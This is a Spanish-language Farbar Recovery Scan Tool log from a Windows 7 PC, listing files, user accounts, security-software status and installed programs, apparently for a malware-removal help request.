2020-03-13 20:41 - 2017-05-21 00:20 - 000000000 ____D C:\KMPlayer
2020-03-13 09:29 - 2013-01-30 15:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-03-12 13:02 - 2015-05-15 05:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Archivos en la raíz de algunos directorios ========

2009-10-28 21:38 - 2009-02-10 13:23 - 000192484 _____ () C:\Program Files (x86)\Common Files\Acer GameZone online.ico
2011-09-12 13:38 - 2012-12-13 00:53 - 000000121 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Camdata.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamLayout.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamShapes.ini
2011-09-12 13:37 - 2012-12-13 00:52 - 000004416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamStudio.cfg
2010-08-29 00:04 - 2013-01-28 20:11 - 000000153 _____ () C:\Users\MARCO AVILA\AppData\Roaming\default.rss
2010-08-29 00:04 - 2010-08-29 00:04 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\downloads.m3u
2019-09-21 23:40 - 2019-09-21 23:47 - 000002459 _____ () C:\Users\MARCO AVILA\AppData\Roaming\droid4xinstaller.log
2014-03-13 22:31 - 2014-03-13 22:31 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Roaming\history.Excel.pwcdat
2019-06-16 01:13 - 2019-06-16 01:36 - 000000556 _____ () C:\Users\MARCO AVILA\AppData\Roaming\koukou.ini
2015-06-03 21:12 - 2015-06-03 21:12 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\ProXoft
2010-09-26 17:44 - 2010-09-26 17:44 - 000002355 _____ () C:\Users\MARCO AVILA\AppData\Roaming\SAS7_000.DAT
2015-11-15 20:33 - 2015-11-15 20:33 - 000001181 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt
2015-11-15 20:33 - 2015-11-15 20:33 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2012-01-11 00:27 - 2012-01-11 00:27 - 000037346 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Valores separados por comas (DOS).ADR
2017-12-03 12:59 - 2017-12-03 12:59 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\wklnhst.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ () C:\Users\MARCO AVILA\AppData\Local\Config.xml
2010-09-01 20:43 - 2020-03-22 02:21 - 000024576 _____ () C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-04-19 15:25 - 2013-04-19 15:25 - 000118823 _____ () C:\Users\MARCO AVILA\AppData\Local\debuggee.mdmp
2012-02-28 14:05 - 2012-02-28 14:05 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Local\fusioncache.dat
2017-04-03 16:12 - 2017-04-03 16:12 - 000002594 _____ () C:\Users\MARCO AVILA\AppData\Local\recently-used.xbel
2010-12-05 00:07 - 2018-11-04 19:36 - 000007661 _____ () C:\Users\MARCO AVILA\AppData\Local\Resmon.ResmonCfg
2012-01-25 14:06 - 2012-01-25 14:06 - 000017408 _____ () C:\Users\MARCO AVILA\AppData\Local\WebpageIcons.db

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-03-19 13:04
==================== Final de FRST.txt ========================
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (27-03-2020 19:45:32)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-06-20 03:49:32)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1649130365-987012723-906343211-500 - Administrator - Disabled) => C:\Users\Administrador.MAAH-PC
ASPNET (S-1-5-21-1649130365-987012723-906343211-1015 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1649130365-987012723-906343211-1020 - Limited - Enabled)
Invitado (S-1-5-21-1649130365-987012723-906343211-501 - Limited - Disabled)
MARCO AVILA (S-1-5-21-1649130365-987012723-906343211-1000 - Administrator - Enabled) => C:\Users\MARCO AVILA

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

64 Bit HP CIO Components Installer (HKLM\...\{55D55008-E5F6-47D6-B16F-B2A40D4D145F}) (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Crystal Eye webcam Ver:1.1.124.1120 (HKLM-x32\...\{D0ACE89D-EC7F-470F-80BE-4C98ED366B32}) (Version: 1.1.124.1120 - Chicony Electronics Co.,Ltd.)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{8ed9688e-4f79-4308-91ca-f1c37ca142b4}_is1) (Version: 5.1.0.2 - Oberon Media, Inc.)
Acer GridVista (HKLM-x32\...\GridVista) (Version: 3.01.0730 - Acer Inc.)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0715 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.255 - Adobe)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Advanced Archive Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced Archive Password Recovery) (Version: 4.50 - ElcomSoft Co. Ltd.)
Advanced Office Password Recovery (HKLM-x32\...\{867A00F3-027A-4946-8CE2-F77FEBCD1BA8}) (Version: 5.2.498.423 - Elcomsoft Co. Ltd.)
Advanced PDF Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced PDF Password Recovery) (Version: 5.0 - ElcomSoft Co. Ltd.)
Advanced RAR Password Recovery (remove only) (HKLM-x32\...\Advanced RAR Password Recovery) (Version:  - )
Advanced RAR Repair v1.2 (HKLM-x32\...\Advanced RAR Repair v1.2) (Version:  - )
Advanced VBA Password Recovery PRO (HKLM-x32\...\Advanced VBA Password Recovery PRO) (Version:  - )
Advanced ZIP Password Recovery (remove only) (HKLM-x32\...\Advanced ZIP Password Recovery) (Version:  - )
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
AndreaMosaic 3.33.0 (HKLM-x32\...\AndreaMosaic) (Version:  - )
Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Archivos auxiliares de instalación de Microsoft SQL Server 2008 (HKLM\...\{A639F412-1C05-4DCB-BF41-AD122A09E79C}) (Version: 10.2.4000.0 - Microsoft Corporation)
Ares 2.1.7 (HKLM-x32\...\Ares) (Version: 2.1.7-Build#3041 - Ares Development Group)
Ashampoo Burning Studio 8.02 (HKLM-x32\...\Ashampoo Burning Studio 8_is1) (Version: 8.0.2 - ashampoo GmbH & Co. KG)
Ashampoo Snap 8 (HKLM-x32\...\{C92AB6F1-3B65-B79C-9019-8640F02B7C58}_is1) (Version: 8.0.7 - Ashampoo GmbH & Co. KG)
Asistente Infinitum (HKLM-x32\...\{BD1806A5-1B46-4DDC-A0B6-5F4D48022C78}) (Version: 1.7.0 - Fine Point Technologies, Inc.)
ASOFARMA (HKLM-x32\...\Vademecum IPE_is1) (Version:  - )
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.10 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 8.0.0.171 - Atheros)
AutoPlay Media Studio 8 Personal Edition (HKLM-x32\...\AutoPlay Media Studio 8 Personal Edition) (Version: 8.0.1.1 - Indigo Rose Corporation)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.307.8213 - BlueStack Systems, Inc.)
CambridgeSoft Activation Client (HKLM-x32\...\{E773E0B9-6ABE-4F9E-816C-56B2DD8613B9}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemOffice Ultra 2010 (HKLM-x32\...\{D5402C39-C1C1-48F6-99C2-36C7937EE7EB}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemScript 12.0 (HKLM-x32\...\{E145D9BE-D521-4527-A85D-2B2D47725506}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ENotebook 12.0.1 (HKLM-x32\...\{F596E368-2A1D-4896-AB37-C81BFA4DD011}) (Version: 12.0.1 - CambridgeSoft Corporation)
Camtasia Studio 8 (HKLM-x32\...\{B1F8F5EB-75E2-40C3-9A50-7907F1C910F1}) (Version: 8.0.3.994 - TechSmith Corporation)
CBTL_TwitterImageDownloader (HKLM-x32\...\{2223143E-3B2D-46B4-BD2F-B6DEAED131EF}) (Version: 2.00.0000 - Code Between The Lines)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
CollageIt 1.1.6 (HKLM-x32\...\{D9757258-30B2-496E-86F2-84920C5858E1}_is1) (Version:  - PearlMountain Soft)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
CoreAAC (HKLM-x32\...\CoreAAC) (Version:  - )
CPUID CPU-Z 1.86 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.86 - CPUID, Inc.)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.R.L.)
CyberLink PowerDVD 8 (HKLM-x32\...\InstallShield_{2BF2E31F-B8BB-40A7-B650-98D28E0F7D47}) (Version: 8.1.3405.50 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Descargador de Video de Apowersoft V6.2.1 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.1 - APOWERSOFT LIMITED)
DjVuLibre+DjView (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.24+4.7c - DjVuZone)
EaseUS Data Recovery Wizard 6.1 (HKLM-x32\...\EaseUS Data Recovery Wizard 6.1_is1) (Version:  - EaseUS)
Eines de correcció del Microsoft Office 2016: català (HKLM-x32\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Electrum (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Electrum) (Version: 3.2.2 - Electrum Technologies GmbH)
eSobi v2 (HKLM-x32\...\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
EVEREST Ultimate Edition v4.60 (HKLM-x32\...\EVEREST Ultimate Edition_is1) (Version: 4.60 - Lavalys, Inc.)
ExamDiff Pro 8.0 (8.0.1.2, 64-bit) (HKLM\...\ExamDiff Pro 8.0_is1) (Version: 8.0.1.2 - PrestoSoft LLC)
ExpressVPN (HKLM-x32\...\{4520629e-a2a3-4646-81b1-ed6e089a24be}) (Version: 7.2.3.9028 - ExpressVPN)
ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B846EDAB75}) (Version: 7.2.3.9028 - ExpressVPN) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM-x32\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
First Class Flurry (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115208410}) (Version:  - Oberon Media)
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version:  - FreeDownloadManager.ORG)
Free Studio version 5.3.5 (HKLM-x32\...\Free Studio_is1) (Version: 5.3.5 - DVDVideoSoft Ltd.)
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
GetFLV 9.7.6.9 (HKLM-x32\...\GetFLV_is1) (Version:  - GetFLV, Inc.)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.51.5315 - GOM & Company)
GOM Remote (HKLM-x32\...\GOM Remote) (Version: 2.1.1.5 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 80.0.3987.149 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
guaca Screen Saver (HKLM-x32\...\guaca) (Version:  - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HTTP Analyzer V7.6.4 (HKLM-x32\...\{8DF9C507-AB88-43E4-A4F0-E2E493C4B0CE}_is1) (Version: 7.6.4 - IEInspector Software)
ImagXpress (HKLM-x32\...\{A8F2089B-1F79-4BF6-B385-A2C2B0B9A74D}) (Version: 7.0.74.0 - Nero AG) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1892 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
IsoBuster 2.8.5 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8.5 - Smart Projects)
Jaksta Streaming Media Recorder (HKLM\...\{04FE9AD5-1ABC-4297-B2A5-6495D4977B4B}) (Version: 4.1.1 - Applian Technologies)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.9.2 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.9.2 - )
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.2.2.34 - PandoraTV)
Launch Manager (HKLM-x32\...\LManager) (Version: 3.0.03 - Acer Inc.)
Lupas Rename 2000 v5.0 Release (HKLM-x32\...\Lupas Rename 2000_is1) (Version:  - Ivan Anton Albarracin)
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Marco trabajo apl. capa datos de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{B65527FD-47DD-4A07-9E07-64DA91B0A34A}) (Version: 10.50.1447.4 - Microsoft Corporation)
Mendeley Desktop 1.17.9 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.9 - Mendeley Ltd.)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (HKLM-x32\...\{939C80FA-96C9-44A6-B318-8E7D8BD8481B}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
MestReNova LITE 5.2.5-4731 (HKLM-x32\...\MestReNova LITE) (Version: 5.2.5-4731 - Mestrelab Research S.L.)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - ESN (HKLM-x32\...\{B0DF0057-EF87-471D-A80A-DC1F0463BA19}) (Version: 2.0.50331.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - ESN (HKLM-x32\...\{4F19E81D-168E-4E0B-A4B7-AA246FBE3FBB}) (Version: 2.0.50414.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{1803A630-3C38-4D2B-9B9A-0CB37243539C}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0100-0C0A-0000-0000000FF1CE}_OMUI.es-es_{D79E9128-A250-4155-BE90-2BE81DE0406A}) (Version:  - Microsoft)
Microsoft Office Excel 2007 Help Actualización (KB963678) (HKLM-x32\...\{90120000-0016-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59E09C3D-4878-47D9-87DB-6D0018026889}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Language Pack 2007 - Spanish/Español (HKLM-x32\...\OMUI.es-es) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Outlook 2007 Help Actualización (KB963677) (HKLM-x32\...\{90120000-001A-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59C244C2-0C37-4E85-8F7E-DBDD3958B694}) (Version:  - Microsoft)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0C0A-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Powerpoint 2007 Help Actualización (KB963669) (HKLM-x32\...\{90120000-0018-0C0A-0000-0000000FF1CE}_OMUI.es-es_{F318245D-05AE-4681-A749-A036CE44AF29}) (Version:  - Microsoft)
Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Word 2007 Help Actualización (KB963665) (HKLM-x32\...\{90120000-001B-0C0A-0000-0000000FF1CE}_OMUI.es-es_{377BA42A-1C84-45D6-94B8-6D00887D172D}) (Version:  - Microsoft)
Microsoft OneDrive (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK - Español (HKLM-x32\...\{8D8C5BD0-7FC7-4680-B527-218F63920E03}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{10E05081-646C-4130-A166-83283A3A0A45}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{12F3060C-64C4-4872-BB3C-4DCBA7877987}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{F188B6ED-4537-4CAC-A4DE-3BD30E6114C6}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{6C239446-F196-44DC-9148-8D912895D097}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{2A78694E-ACFE-4D5A-9B0F-C0EBEFA3F280}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ESN (HKLM\...\{24965A31-311D-462D-BAA8-B482ABA115D8}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{79BF7CB8-1E09-489F-9547-DB3EE8EA3F16}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{46878B08-238C-4F28-9194-9D8604A7F52E}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{CD9B2BA6-F699-4700-81B9-CD28C0BC693C}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{DE63A8FE-80A6-4CA3-ACEA-F954B6370596}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) es (HKLM\...\{2D6232BE-CDB4-4EE7-AFCB-1541E12041E9}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 es (HKLM-x32\...\{EF948EA2-FA97-4312-BA36-88D76048CCE8}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) es (HKLM\...\{C69733F2-4140-440F-938E-2D47C6CB1C70}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) es (HKLM\...\{1C3998E1-8501-455C-B829-5031520EBC94}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM-x32\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{61B42D05-EBFA-3896-A267-B71CD3025BC5}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.30319 (HKLM-x32\...\{6A86554B-8928-30E4-A53C-D7337689134D}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{817C2DCF-4DD7-3C32-8A8E-7CEFF137E543}) (Version: 10.0.30319 - Microsoft Corporation)
